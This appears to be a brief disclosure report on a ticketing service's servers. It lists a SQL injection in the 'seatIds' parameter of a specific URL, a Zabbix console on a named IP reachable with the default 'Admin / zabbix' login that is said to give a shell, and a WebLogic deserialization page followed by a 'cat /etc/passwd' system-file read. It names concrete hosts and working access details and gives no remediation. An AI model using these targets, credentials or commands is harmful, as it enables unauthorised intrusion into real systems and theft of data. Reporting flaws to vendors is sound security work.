Tickets passed Multiple Vulnerabilities (SQL injection, command execution, and deserialization)
1> SQL injection
URL: http://119.254.105.143/ticket/web.go?Method=policyCal&showId=060671&seatIds=10210985&key=IF4F8DK1IFS891KF9S8FKFD8
The seatIds parameter is vulnerable to SQL injection.
2> Zabbix command execution
http://119.254.105.222/zabbix/
Login: Admin / zabbix
This gives a shell directly.
3> Java deserialization
http://119.254.105.172:7001/console/login/LoginForm.jsp
cat /etc/passwd